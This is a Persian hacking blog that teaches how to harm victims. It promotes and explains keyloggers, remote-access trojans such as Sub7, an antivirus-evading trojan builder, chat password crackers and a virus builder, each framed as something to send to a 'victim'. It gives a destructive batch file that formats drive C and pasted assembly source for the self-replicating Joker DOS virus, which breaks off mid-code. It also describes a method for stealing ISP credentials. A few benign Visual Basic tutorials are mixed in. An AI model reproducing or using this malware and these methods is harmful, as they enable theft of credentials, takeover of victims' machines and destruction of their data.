آموزش ویروس نویسی ویژوال بیسیک هک و بوت

نام برنامه :Gods Of War IV.login Fixed

یک بوتر قدرتمند و جدید که براحتی میتونه فرد مورد نظررو بوت کنه .این بوتر کاملا حرفه ای

طراحی شده این برنامه رو خودم امتحان کردم کارش عالیه.

\|	نوشته شده توسط قاسم صدفی

نام برنامه : E LITE KEYLOGGER

توضیح درباره برنامه : این برنامه یک کی لاگر بسیار قدرتمند هست.شما میتونید یک فایل سرور

بسازید و به قربانی بدهید و قربانی هر چه تایپ کند متن کامل آن به ایمیل شما فرستاده میشود و شما

میتوانید پسورد ایمیل و هر چیز دیگر را پیدا کنید.

دانلود

\|	نوشته شده توسط قاسم صدفی

نام برنامه : در اختیار گرفتن سیستم قربانی

با دادن ip and port به این برنامه میتونید سیستمشو در اختیار بگیرید فقط کافیه IP طرف رو

گیر بیارین که کار خیلی سختی نیست برنامه شو هم پایین گذاشتم . موفق باشین

دانلود برنامه

شاید ندونید آی پی و پورت طرف چیه. .خوب اشکال نداره فقط کافیه برنامه زیرو دانلودکنید

و موقع چت کردن با طرف باز بزارید تا ای پی طرفو نشونتون بده

دانلود برنامه

\|	نوشته شده توسط قاسم صدفی

در این پست می خواهم آموزش برنامه ای رو بدم که در قسمت نظرات دوستان از من در

خواست برنامه ای رو کرده بودن که بدون فرستادن هیچ فایلی پسورد ایدی فرد مورد نظر

را هک کنند کرده بودند

نام برنامه : CRAB-N-CRACK 1.0

این برنامه به شما این امکان را میدهد تا بدون ارسال هیچگونه فایلی پسورد فرد مورد نظر را هک

کنید . تنها کافیست قربانی را به یک روم دعوت کنبد و با نرم افزار به روم لاگین شوید تا در عرض مدت

کوتاهی پسورد آیدی قربانی برای شما ظاهر شود. تنها به شما تذکر میدهیم از این نرم افزار در راه

درست استفاده کنید. این نرم افزار نیاز به صبر زیادی دارد و نباید زود در مورد برنامه قضاوت کرد.

1_ شما باید در قسمت یوزر :پسورد ای دی وپسوردتونو بدین و لوگین شوید

2_ باید میان آیدی و پسورد : باشد

3_ در قسمت chat room :1 اسم چت رومی که طرف داخلش هست بنویسید

4_ در قسمت load password پسورد ها رو لود کنید

5_ وقتی وارد روم شدید ایدی مورد نظر را انتخاب و دگمه commenceرا انتخاب کنید

تا برنامه پسورد قربانی را هک کند(کرک) و در قسمت save passwordهم میتوانید

پسور ها را save کنید.

download crab-n crack 1.0

\|	نوشته شده توسط قاسم صدفی

نام برنامه : WER REMOTE 2.1

با استفاده از این ریموت میتونید پس از آنکه قربانی فایل سرور را باز کرد تمام سیستم

طرف را زیر دست بگیرید . این ریموت یک برنامه استثنائی هستش و امکانات فوق اولعاده

بالایی برای هک کردن داره .

DOWNLOAD WER REMOTE 2.1

\|	نوشته شده توسط قاسم صدفی

تروجان

سیاری از دوستان از من نرم افزاری برای ساخت تروجان رو درخواست کرده بودند !! اگر کمی دیر شد معذرت میخوام !
نرم افزار Tak-PS که توسط آقای مهدی به وسیله Delphi 7 نوشته شده، میشه گفت در حال حاضر یکی از قدرتمندترین و کاربردی ترین نرم افزار ساخت تروجان هست که هیچ آنتی ویروسی آن را تشخیص نمیدهد !
بعضی خصوصیات و قابلیت های این نرم افزار عبارتند از :

- فرستادن پسورد آیدی یاهو مسجر حتی نسخه 7
- فرستادن Username و Password در Dial-UP Connection
- فرستادن IP Address
- غیر فعال کردن Regedit
- غیر فعال کردن Task Manager
- ایجاد پیغام خطا
- ایجاد آیکون عکس و قلب
- و...

Info که همه این اطلاعات با اجرا شدن تروجان ساخته شده توسط این نرم افزار در کامپیوتر قربانی برای آدرس E-Mail شما فرستاده خواهند شد !
شما کافی است که مشخصات و کارایی تروجان را مشخص کرده و بجای Darkboy_xxx@yahoo.com آدرس E-Mail خودتان را تایپ کنید.

دانلود ۶۳۳کیلو بایت

\|	نوشته شده توسط قاسم صدفی

نام بوتر : most wanted

توضیح درباره بوتر : ورژن 2 بوتر پر قدرت که دارای قسمتهای مربوط به بوتر -روم بوتر و تولز میباشد.

دانلود بوتر

\|	نوشته شده توسط قاسم صدفی

این هم بوترهایی که دوستان تو قسمت نظرات ازمن در خواست کرده بودند

نام بوتر :KillaFucka

توضیح درباره بوتر : این بوتر میتونه ۵۰۰ تا ایدی رو لوگین کنه و دارای ۲۰ ابشن بوت هست و سرعت بوتش حرف نداره شما هم لذت می برید

دانلود بوتر

\|	نوشته شده توسط قاسم صدفی

سلام به دوستان عزیز از امروز سعی دارم برای شما آموزش ویزوال بیسیک ۶ بدم که شاید خیلی هاتون

با این برنامه آشنا باشین برای این کار شما باید این برنامه را دانلود کنید که لینک دانلودش رو هم

واستون گذاشتم.این هم لینک دانلود ویژوال بیسیک ۶ که چندتا از دوستان درخواست کرده بودند .

:: حجم هر قسمت : تقریبا ۴۵ مگابایت - قسمت سوم : ۳ مگابایت

\|	نوشته شده توسط قاسم صدفی

آموزش ساخت Windows Media Player

ویزوال بیسیکرا اجرا کنید standard EXE را انتخاب و open را بزنید روی پنجره سمت چپ (پنجره ابزار)در قسمت پایین راست کلیک کنیدcomponentsرابزنیدلیستی از کنترل ها را می بینید در قسمت controls به قسمت پایین بیایید و اخرین کنترل که
Windows media playerاست را انتخاب(تیک بزنید)همچنین به بالای صفحه بیاییدو کنترل microsoft Common Dialog Control 6.0را پیدا کنید و ان را هم تیک بزنید سپس ok را بزنیدهمان طور که می بینید کنترل windows media playerو microsoft Common Dialog Control 6به پنجره سمت چپ اضافه شدندبا دوبار کلیک روی هر دو کنترل انهارا به form1 اضافه کنید توجه کنید کنترل
common dialogدر حالت طراحی در form1 ظاهر میشود اما وقتی برنامه را اجرا کنید در form1 ظاهر نمی شود (مثل کنترلtimer) حال یک کنترل command Button به form 1ضافه کنیددر پنجره properties مربوط به کنترلCommand Buttonخاصیت caption آن را برابر open music کنید .
در پنجره کد نویسی کنترلCommand Button فرمان زیر را وارد کنید

CommonDialog1.ShowOpen
WindowsMediaPlayer1.URL = CommonDialog1.FileName

حال f5 را بزنید برنامه را امتحان کنید چه جوری؟ این جوری .open music را بزنید پنجره باز میشود اهنگ خودتان را انتخاب کنید و open را بزنید حالا نگاه کن
دوباره F5 را بزنید برنامه را در داخل ویندوزتون بزارید تموم شد!
......
راستی میتونید برای ماشین حساب که جلسه پیش گفتم روابط مثلثاتی قرار بدید فرمانش اینه
(text1.text=sin(text1.text
(text1.text=cos(text1.text

(text1.text=tan(text1.text

\|	نوشته شده توسط قاسم صدفی

آموزش ویروس بلاستر در ویژوال

قابلیت های این ویروس :

1-پنهان باشد( نه در .....دیده بشه ونه فرم اون قابل دیدن باشه )

2-پس هر بار روشن شدن کامپیوتر بلافاصله دو باره آن را خاموش یا ریست کند

3-ویروس یاب ها ها قادر به شناسایی آن نبا شند

اموزش یک برنامه را میدهم که به محض اجرا شدن ویندوز را shutdown می کند

ویژوال بیسیک را اجرا کنید Standard EXE را انتخاب و ok را بزنید روی form1 کلیک راست کنید و view code را بزنید پنجره کد نویسی form1 باز می شودفرمان زیر را تایپ کنید

" Shell "shutdown -s -t 0

توجه کنید بین shutdown و s- فاصله است همچنین بین s- و t- وصفر
بهتر است همین فرمان را کپی و پست کنید.حال برنامه را اجرا نکنید زیرا به محض اجرای ان کامپیوتر خاموش می شود برنامه را در ویندوز قراردهید سپس ویژوال بیسیک را ببندید حالا برنامه را اجرا کنید می بینید که کامپیوتر خاموش می شود.این هم از این.توجه کنید که این برنامه فقط در ویندوز xp عمل می کند.

اموزش برنامه:در این برنامه اگه موس را روی یک کنترل lable1 ببریم موس به گوشه سمت راست بالای صفحه میره و دیگه نمی تونه حرکت کنه
ویژوال بیسیک را اجرا کنید estandard EXE را انتخاب و ok را بزنید حال یک کنترل timerو یک کنترل Label به فرم اضافه کنید حال در قسمت جنرال ( قبلا توضیح داده شده ):دابل کلیک روی فرم و رفتن به بالای صفخه)می نویسیم

\|	نوشته شده توسط قاسم صدفی

برنامه ای که اگه موس(موشواره)روش رفت دیگه قادر به حرکت نباشه

اموزش برنامه:در این برنامه اگه موس را روی یک کنترل lable1 ببریم موس به گوشه سمت راست بالای صفحه میره و دیگه نمی تونه حرکت کنه

ویژوال بیسیک را اجرا کنید estandard EXE را انتخاب و ok را بزنید حال یک کنترل timerو یک کنترل Label به فرم اضافه کنید حال در قسمت جنرال (قبلا توضیح داده
شده :دابل کلیک روی فرم و رفتن به بالای صفخه)می نویسیم

Private Declare Function SetCursorPos Lib "user32" (ByVal X As Long, ByVal Y As Long) As Long
بعد روی timer1 دابل کلیک کرده و در پنجره کد نویسی مربوط به ان تایپ می کنیم

a = 0
b = 0
(temp = SetCursorPos(a, b

در اینجا می تونید مختصاتی را که موس انجا قرار گیرد را میتوانید تعیین کنید ما در اینجا همان طور که می بینید صفروصفر قرار دادیم حال روی کنترل label1 دابل کلیک کنید و پنجره کد نویسی مر بوط به ان را باز کنید
بعد در سمت راست خاصیت click را عوض میکنیم وبه Mouse Move تغییر میدهیم
حال عبارت زیر را تایپ میکنیم

Timer1.Enabled = True

در آخر هم خاصیت Enabled مر بوط به کنترل timer1 را برابر false بگیرید.و خاصیت
Interval را برابر یک قرار دهید.برنامه را در ویندوز قرار دهید.بعد اجراش کنید

\|	نوشته شده توسط قاسم صدفی

آموزش ماشین حساب ساده

ویژوال بیسیک را اجرا کنید standard EXE را انتخاب و ok را بزنیداز پنجره سمت چپ(پنجره ابزار

) 16 عدد کنترل command button و یک کنترل textbox به فرم 1 اضافه کنید
از پنجره properties خاصیتcaption کنترل Command1 را برابر 1 بگیرید
خاصیتcaption کنترل Command1 را برابر 1 بگیرید
خاصیتcaption کنترل Command2 را برابر 2 بگیرید
خاصیتcaption کنترل Command3 را برابر 3 بگیرید
خاصیتcaption کنترل ها را به این ترتیب تا command9 ادامه دهیدcommand9 هم
حال خاصیتcaption کنترل Command10 را برابر + بگیرید
خاصیتcaption کنترل Command10 را برابر + بگیرید
خاصیتcaption کنترل Command11 را برابر - بگیرید
خاصیتcaption کنترل Command12 را برابر * بگیرید
خاصیتcaption کنترل Command13 را برابر / بگیرید
خاصیتcaption کنترل Command14 را برابر = بگیرید
خاصیتtext کنترل ها را مرتب کنید

رل text1 را برابر خالی بگیرید
خاصیتcaption کنترل Command15 را برابر صفر بگیرید
حال مانند شکل کنت

حال در پنجره کد نوبسی هر کنترل بنا به زیر نوشته شود

برای command1کد Text1.Text = Text1.Text & 1
برای command2کد Text1.Text = Text1.Text & 2
برای command3کد Text1.Text = Text1.Text & 3
به همین ترتیب تا کنترل command9 عمل کنید command9 هم
برای command15کد Text1.Text = Text1.Text & 0
برای command10کد
     "a = "j
b = Text1.Text
""=Text1.Text
برای command11کد
"a = "m
b = Text1.Text
""=Text1.Text
برای command12کد
"a = "z
b = Text1.Text
""=Text1.Text
برای command13کد
"a = "t
b = Text1.Text
""=Text1.Text

برای command14کد
(If a = "m" Then Text1.Text = Val(b) - Val(Text1.Text
(If a = "z" Then Text1.Text = Val(b) * Val(Text1.Text
(If a = "t" Then Text1.Text = Val(b) / Val(Text1.Text
(If a = "j" Then Text1.Text = Val(b) + Val(Text1.Text

حال روی form1 کلیک راست کنید و view code را بزنید به بالای پنجره بروید
و در قسمت بالای پنجره (این بخش general نام دارد)عبارت زیر را تایپ کنید
dim a,b as String
حالا F5 را بزنید برنامه را امتحان کنید و دوباره F5 ا بزنید برنامه را در ویندوز قرار دهید

\|	نوشته شده توسط قاسم صدفی

ساخت یک ویروس شوخی

امروز شما با ويروس Flicker آشنا ميشويد .البته شايد بعضي از شما آن را بشناسيد چون برنامه نسبتا معروفي است كه بيشتر براي شوخي كردن از آن استفاده ميشود.(البته Flicker بيشتر شباهت به يك برنامه اعصاب خوردكن دارد تا يك ويروس).Flicker در معني به معناي چشمك زن و سوسو زدن است و دليل اين نامگذاري اين است كه اين به اصطلاح ويروس كاري ميكند كه كاربر هرگاه دكمه اي از كيبرد را فشار دهد يك صداي بوق كه به آن اصطلاحا Beep گفته مشود از كامپيوتر شنيده ميشود و هم زمان با اين صدا صفحه مانيتور يكبار بطور سريع چشمك ميزند.و با اين وضع عملا كار با كيبورد امكاپذير نيست. لارم به ذکر است که طریقه غیرفعال کردن این ویروس نیز ذکر شده است.

اين ويروس از آن دسته است كه به كمك رجيستري كار ميكند.
خب حالا ميرسيم به شروع كار:
Notepad را باز كنيد و عبارت زير را در آن وارد كنيد(پيشنهاد ميكنم Copy و Paste كنيد).

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]

"Flags"="127"

[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]

"Flags"="3"

"WindowsEffect"="3"

سپس آن را با پسوند Reg و با نامي مثل FlickerON.Reg سيو كنيد. حال يك فايل Notepad ديگر باز كنيد و عبارت زير را به منظور غيرفعال كردن ويروستان در آن Copy و Paste كنيد:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]

"Flags"="126"

[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]

"Flags"="2"

"WindowsEffect"="0"

و آن را هم به همان روش بالا ولي اين بار با نامي مثل FlickerOff.Reg سيو كنيد.
حال شما دو فايل رجيستري ساختيد كه با كليك كردن روي هركدام از آنها از شما اجازه گرفته و درون رجيستري Import ميشوند.حال براي امتحان روي FlickerOn كليك كنيد و وقتي Import شد كامپيوتر خود را Restart كنيد تا نحوه كارش را ببينيد.

مهم: واضح است كه براي غير فعال مكردن بايد همين كارها را با FlickerOff انجام دهيد با اين تفاوت كه شما در آن موقع فقط ميتوانيد از Mouse استفاده كنيد چون كيبورد شما كماكان غير قابل استفاده است!

لازم به ذكر است كه همه ويروسها مثل Flicker مستقيما به كمك رجيستري عمل نميكنند و روشهاي مختلفي براي كار دارند.

\|	نوشته شده توسط قاسم صدفی

نام برنامه : Toxic-CV

توضیح درباره برنامه : Toxic-CV یک نرم افزاره که می تونه یک ویروس با قابلیت ها یی که

شما ا نتخاب می کنید درست کنه . شما می تونید این ویروس رو به کسی که

می خواین اذیتش کنید بفرستین . در ضمن Cv مخفف Custimized Virus هست.

قابلیت های برنامه :

-راه اندازی در StartUp (بدون نمایش در Msconfig)

2-غیر فعال کردن TaskMgr,Msconfig,Regedit,Norton Anti Virus,Mcafee Antivirus,Windows Firewall

3-قابلیت تعیین نام ویروس بعد از Install

4-پشتیبانی از پسوند ها مهم فایل های اجرایی مانند : exe , scr, bat , cmd , pif

5-قابلیت انتخاب Icon ویروس

5-پیغام خطای کاذب ( Fake Message )

6-قابلیت بخشیدن قربانی به 2 صورت

7-قابلیت های آزار قربانی مانند : پر کردن هارد ، بوق زدن ! ، کم کردن سرعت کامپیوتر ، و ....

8- حجم بسیار کم : 10-9 کیلوبایت

آموزش استفاده از برنامه :

برنامه رو اجرا کنید و در صفحه ی About روی Ok کلیک کنید .
خوب تو صفحه ی اصلی بخش اول یعنی General Settings واضحه و معمولا تو بیشتر Ps ها هم هست .بخش Exe Icon & Name هم که واضحه و به نام و Icon ویروس قبل از اینکه نصب شه اشاره داره
بخش Fake Message هم که واضح تر از همست .

بخش Forgive Victim : این بخش واسه انتخاب گزینه هایی برای تنظیم بخشش یا عدم بخشش قربانی هست . خوب شما اینجا سه تا گزینه می بینید :

الف : Forgive victim with this password : با انتخاب این گزینه اون قربانی که ویروس تو کامپیوترش اینستال شده با فشار دادن Alt + Ctrl + Del صفحه ای رو می بیینه که ازش یک رمز
می خواد اگه قربانی اون رمزی رو که شما در روبه روی این گزینه وارد کردید رو وارد کنه . ویروس غیر فعال می شه .

ب : Forgive victim after a restart : با انتخاب این گزینه ویروس بعد از یک ریستارت غیر فعال می شه .

چ : Don't forgive victim : با انتخاب این گزینه ویروس به هیچ وجه غیر فعال نمیشه .

حالا می رسیم به بخش Enable & Disable Viruses : تو این بخش شما می تونید قسمت های مختلف آزار قربانی خودتان رو در ویروس فعال یا غیر فعال کنید .
شرح قسمت ها مختلف :

1- Gardually decrease system speed : اگه این گزینه انتخاب بشه ویروس به تدریج سرعت سیستم رو کم می کنه تا جایی که .... .

2- Gradually fill the hard : اگه این گزینه انتخاب بشه ویروس به تدریج هارد رو پر می کنه تا جایی که .....

3-Disable Yahoo! Messenger : اگه این گزینه انتخاب بشه ویروس یاهو مسنجر رو غیر فعال می کنه !

4- Beep every second : اگه این گزینه انتخاب شه ویروس هر ثانیه بوق می زنه !

5- Swap mouse buttons every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثایه به مدت 10 ثانیه جای دکمه های ماوس رو عوض می کنه !

6-Shutdown computer every 20 minutes : اگه این گزینه انتخاب شه ویروس بعد از 20 دقیقه که از روشن شدن کامپیوتر / اجرا شدن ویروس بگذره سیستم قربانی رو شات داون می کنه .

7- Lock Computer Every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثانیه به مدت 10 ثانیه کامپیوتر رو قفل می کنه .

وقتی همه ی تنظیمات رو انجام دادید روی Create Virus کلیک کنید فایل ویروس به نامی

که شما در قسمت Exe name وارد کردید در پوشه ای که برنامه توش اجرا شده ساخته می شه .

این برنامه رو از لینک زیر دانلود کنید...

Toxic-Cv

\|	نوشته شده توسط قاسم صدفی

در اولین جا میخوام روشی رو براتون بنویسم که در هیچ جایی فکر نکنم چنین چیزی را بتونید پیدا کنید.

می خوام بهتون برنامه ای معرفی کنم و طریقهء استفاده از اون را براتون بنویسم که همه ی کاربران ویندوز ایکس پی اون برنامه را می شناسند و یا تو کامپیوتر خود دارند ولی ازش استفاده نمی کنند.

این برنامه ی جالب هایپرترمینال HyperTerminal هستش.بله عزیزان این برنامه در ویندوز ایکس پی در منوی استارت قرار داره و برنامه ای بسیار جالب و ساده برای هک هستش.

Start Menu\All Programs\Accessories\Communications\HyperTerminal

در کل کار این برنامه فرستادن و گرفتن فایل و چت و ارتباط بین دو کامپیوتر بدون استفاده از کارت اینترنت هست. یعنی دو تا کامپیوتر می تونن توسط اون با همدیگر ارتباط برقرار کنن و فایلهایی را برای هم بفرستن.

حالا بریم سر اصل مطلب: ابتدا برنامه را اجرا کنید. در این قسمت یک اسمی برای ارتباط خودتون وارد کنید. فرقی نمی کنه چه باشه. در قسمت دوم شماره تلفن ISP تون رو بنویسید که می خواهید هکش کنید.

حالا با زدن دکمه ی Conect شما به آی اس پی تون وصل میشید . حالا با زدن کلید اینتر یه چیزهایی تو صفحه ی سفید برنامه نوشته می شوند که اگر نامفهوم بود یک آی اس پی دیگه را امتحان کنید و اگر قابل فهم بود چیزهایی مثل این را مشاهده کردید که همگی بستگی به اون شرکت داره اما زیاد تفاوتی نمی کنن.

Welcome To ROUTER

Username :

PassWord :

شما حتما باید یک کارت اینترنت داشته باشید از اون شرکت تا بتونید وارد سیستمش بشید . که تو اینجا با وارد کردن اسم رمز و پسورد (پسورد وقتی می خواهید بنویسید دیده نمیشه چیزهایی مثل اعلان داس را میبینید:

Router :>_

حال شما به مرحلهء حساسی وارد شدید که خیلی مهمه. بله اینجا قلب سیستم هستش یعنی شما با نوشتن چیزهایی که میگم می تونید اطلاعات مهم و حیاطی از اون شرکت را بدست بیارید از جمله شماره ی کارت اینترنت کسایی که روی خط هستن و شماره ی آی پی (درباره ی آی پی IP بعدا مفصل توضیح میدم) اونها و......

در اینجا چند تا از فرمانهای حساس اون رو براتون توضیح می دم :

Systat با نوشتن این فرمان اطلاعاتی از کلیهء اسم رمزهای کسایی که روی خط هستن را براتون نمایش می ده.

Login با صادر کردن این فرمان می تونید به آی پی های دیگران وصل شوید.

Help نمایش کلیهء فرمانهای مجاز.

نکته ی مهم که باید بگم اینه که در این نوع ارتباط فرمانهایی وجود دارن مثل ایجاد حساب و یا حذف حساب که شما نمی تونید این کارها رو انجام بدید. برای این کار باید اسم رمز خاصی را در اول برنامه بنویسید که اون هم در اختیار صاحب آی اس پی هست.

حالا با این روش شما میتونید اینترنت مجانی استفاده کنید البته اگه وجدان دارید نکنید .دلتون میاد یکی همین بلا رو سر شما بیاره؟

\|	نوشته شده توسط قاسم صدفی

آموزش sub 7

این قسمت مخصوص افراد مبتدی و کسانی که به این مطلب نیاز دارند.

برای شروع ابتدا نرم افزار رو از لینک زیر دانلود کنید.سپس وارد آن شده و برنامه

edit server رو اجرا کنید.بعد از اکسترکت کردن وارد بخشی که برنامه رو نصب کردید

شوید.حالا برنامه edit server رو باز کنید و run in normal mode را انتخاب کنید.بعد

در همانقسمت اول (server sittings) در قسمت پسورد ، یک پسورد انتخاب کنید.بعد

کنار قسمت melt server after instalition را تیک بزنید.حالا به قسمت notifications

بروید و add e-mail notifyرو بزنید و ایمیل خوتون رو وارد کنید و ok رو بزنید.حالا به

قسمت plugins رفته و add binded pluginرو بزنید و پلاگین مورد نظر خود را وارد

کنید.سپس به قسمت exe icon /other رفته و enable fake error massage راتیک

بزنید.حال به قسمت configure error massage بروید و در قسمت text پیغام دروغین

مورد نظر خود را تایپ کنید.شما می توانید icon پیغام دروغین مورد نظر خود را نیز در

این بخش انتخاب کنید.سپس ok را بزنید.بعد درهمان قسمت قبلیchange server

icon را تیک بزنید و آیکوندلخواه خود را برای ساخت فایل سرور انتخاب کنید.

بعد save as... را بزنید و مسیر ساخت فایل سرور خود را انتخاب کنید.حالا آن

را برای شخص قربانی بفرستید.بعد از اینکه اون فرد فایل رو باز کردIP و Port اون برای

شما ارسال می شه.حال به خود برنامه ساب سون رفته و در قسمت IP آیپی

و در قسمت ort Pپورت اون فرد رو وارد کرده و connect رو بزنید.حالا کامپیوتر اون فرد

در دست شماست و میتونید از ستون سمت چپ هر کاری رو کامپیوتر اون انجام بدید!

دانلودsub7

\|	نوشته شده توسط قاسم صدفی

با یک کلیک هارد را فرمت کنید!!!

دوستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد

@echo off call attrib -r -h c:\autoexec.bat echo @echo off >c:\autoexec.b echo format /autotest c:/q>nul call attrib +r +h c:\autoexec.ba exit </body> </html> </body> </html>

یک ویروس خطرناک با نام Joker

برای ساخت این ویروس اول note pad را باز کرده و این کد ها را در آن کپی و پیست نمایید و بعد گزینه file را زده save as را زده بعد آنرا با پسوند bat ذخیره کنید مثلا Joker.bat و save را برای اتمام کار زده و حالا ویروس شما ساخته شد که مواظب باشید روی آن به هیچ وجه کلیک نکنید آنرا برای یکی بفرستید تا سیستم قربانی را به طور خفن داغون کنه. موفق باشید نظر یادتون نره!

title " Joker! virus. Written by The BOOT SECTOR Infector ... " ; ; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original ; had multiple programming errors in it that kept it from replicating. ; My version is much more successful. ; page 255,80 code segment word public 'code' assume cs:code,ds:code org 100h main proc;edure ;EQUates... idc equ 69h ;ID character - (note: 69) cr equ 13 ;ASCII for carriage return lf equ 10 ;ASCII for line feed ;End codes. These determine what happens after the string is displayed. terminate equ 0 ;Terminate program after display halt equ 1 ;Cause the system to hang after display SimulateCritErr equ 2 ;Simulate the critical error handler return2host equ 3 ;Resume program immediately FlashFloppy equ 4 ;Wait for a key, then reset Drive A: WaitKey equ 5 ;Wait for a key, then resume program PauseKey equ 6 ;Same thing, but uses a pause message StackError equ 7 ;Cause a stack overflow (halts system) tof: ;Top-Of-File jmp begin ;Skip over program idchar: db idc ;ID character HostProgram: nop ;First run copy only! nop ;First run copy only! first_four: nop ;First run copy only! address: int 20h ;First run copy only! check: nop ;First run copy only! begin: call nextline ;Push IP+3 onto stack nextline: pop bp ;mov bp,ip sub bp,offset nextline ;bp=disp. for mem locs push ax ;Save AX call cryptor ;Decrypt jmp short retloc ;Continue program cryptor: mov al,[bp+offset encrypt_val] ;encrypt val lea si,[bp+offset toec] ;Top Of Encrypted Code mov cx,offset eoec-offset toec ;Length of " " cryptorloop: xor [si],al ;en/de crypt rol al,cl ;change code # inc si ;Next char please! loop cryptorloop ;loop if necessary ret ;Return to caller infect: call cryptor ;Encrypt code pop cx ;Restore CX for INT 21 int 21h ;Call DOS call cryptor ;Decrypt code ret ;Go back toec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤTop Of Encrypted Code InfectIt: push cx ;Save CX for sub jmp infect retloc: pop ax ;Restore AX xor di,di ;DI = 0 cli ;Disable interrupts mov ss,di ;Set up stack at: mov sp,2F0h ; 0000:02F0 sti ;Enable interrupts mov si,96h ;Vector for INT 24h mov bx,ss:[si] ;BX = offset in segment mov cx,ss:[si+2] ;CX = segment lea dx,[bp+offset int24handler] ;CS:DX -} local handler mov ss:[si],DX ;Save offset mov ss:[si+2],cs ;Save segment mov si,es:[di+2F8h] ;Check operation mode cmp si,4643h ;'CF' if already TSRed jne GoOn ;Nope, jmp jmp return ;Yes, don't do anything GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP mov cs:[di+4Eh],cx ; to save BX and CX push cs ;Copy CS ... pop es ; ... to DS mov byte ptr [bp+offset infected],0 ;Reset infection count mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes mov di,offset tof ;TOF never changes cld ;Read left-to-right movsw ;Copy the 4 bytes movsw ;Copy the 4 bytes mov ah,1Ah ;Set DTA address ... lea dx,[bp+offset DTA] ; ... to *our* DTA int 21h ;Call DOS to set DTA mov ah,4Eh ;Find First ASCIIZ lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 lea si,[bp+offset filename] ;Point to file push dx ;Save DX jmp short continue ;Continue... return: mov ah,1ah ;Set DTA address ... mov dx,80h ; ... to default DTA int 21h ;Call DOS to set DTA xor di,di ;DI= 0 mov es,di ;ES= 0 mov si,96h ;Vector for INT 24h mov bx, cs:[di+4Ch] ;Restore from saved BX mov word ptr es:[si+0], bx ;Place back into vector mov cx, cs:[di+4Eh] ;Restore from saved CX mov word ptr es:[si+2], cx ;Place back into vector push cs ;Move CS ... pop es ; ... to ES mov ax,[bp+offset SavedAX] ;Restore AX xor bx,bx ;BX= 0 mov cx,bx ;CX= 0 mov dx,cx ;DX= 0 mov si,dx ;SI= 0 mov di,si ;DI= 0 mov sp,0FFFEh ;SP= FFFEh (normal) mov bp,100h ;BP= 100h (RETurn addr) push bp ; Put on stack mov bp,ax ;BP= 0 ret ;JMP to 100h nextfile: or bx,bx ;Did we open the file? jz skipclose ;No, so don't close it mov ah,3Eh ;Close file int 21h ;Call DOS to close it xor bx,bx ;Set BX back to 0 skipclose: mov ah,4Fh ;Find Next ASCIIZ continue: pop dx ;Restore DX push dx ;Re-save DX xor cx,cx ;CX= 0 xor bx,bx int 21h ;Find First/Next jnc skipjmp jmp NoneLeft ;Out of files skipjmp: mov ax,3D02h ;open file mov dx,si ;point to filespec int 21h ;Call DOS to open file jc nextfile ;Next file if error mov bx,ax ;get the handle mov ah,3Fh ;Read from file mov cx,4 ;Read 4 bytes lea dx,[bp+offset first_four] ;Read in the first 4 int 21h ;Call DOS to read cmp byte ptr [bp+offset check],idc ;Already infected? je nextfile ;Yep, try again ... ;NOTE: Delete the two lines above if you want it to re-infected programs. cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? je nextfile ;Yep, maybe next time! mov ax,4202h ;LSeek to EOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek cmp ah,0F8h ;Longer than 62K? ja nextfile ;Yep, try again... mov [bp+offset addr],ax ;Save call location mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;Point to buffer int 21h ;Save the first 4 bytes mov ah,[bp+offset encrypt_val] ;Get code number inc ah ;add 1 adc ah,0 ;increment if it's zero mov [bp+offset encrypt_val],ah ;Save new code number mov ah,40h ;Write to file mov cx,offset eof-offset begin ;Length of target code lea dx,[bp+offset begin] ;Point to virus start call InfectIt ;Exempt from encryption ComeBackHere: mov ax,4200h ;LSeek to TOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek mov ax,[bp+offset addr] ;Retrieve location inc ax ;Adjust location mov [bp+offset address],ax ;address to call mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. mov byte ptr [bp+offset check],idc ;EOFMARK mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;4 bytes are at [DX] int 21h ;Write to file inc byte ptr [bp+offset infected] ;increment counter dec byte ptr [bp+offset max2kill] ;decrement counter jz TheEnd ;If 0 then End inc byte ptr [bp+offset encrypt_val] ;change code # adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0 jmp nextfile ;Next victim! NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected? jae TheEnd ;The party's over! mov di,100h ;DI= 100h cmp word ptr [di],20CDh ;an INT 20h? je TheEnd ;Don't go to prev. dir. lea dx,[bp+offset prevdir] ;'..' mov ah,3Bh ;Set current directory int 21h ;CHDIR .. jc TheEnd ;We're through! mov ah,4Eh jmp continue ;Start over in new dir TheEnd: xor di,di ;DI= 0 mov es,di ;ES= 0 mov ah,2ah ;Get date int 21h ;Do it cmp dl,4 ;4th of the month? jne test2 ;Nope, second test cmp dh,7 ;July? jne test2 ;Nope, second test xor ax,ax ;Sector 0 jmp Kill ;Kill the disk now... test2: mov ah,2ch ;Get time int 21h ;Do it or cl,cl ;On the hour? (x:00 xM) jnz GiveUp ;Return to program cmp ch,6 ;Midnight to 5 AM ??? jnl GiveUp ;Return to program add cl,ch ;Add first number mov ax,cx ;Transfer to AX cbw ;Zero out AH add al,dh ;Add DL to AL adc al,dl ;Add DL 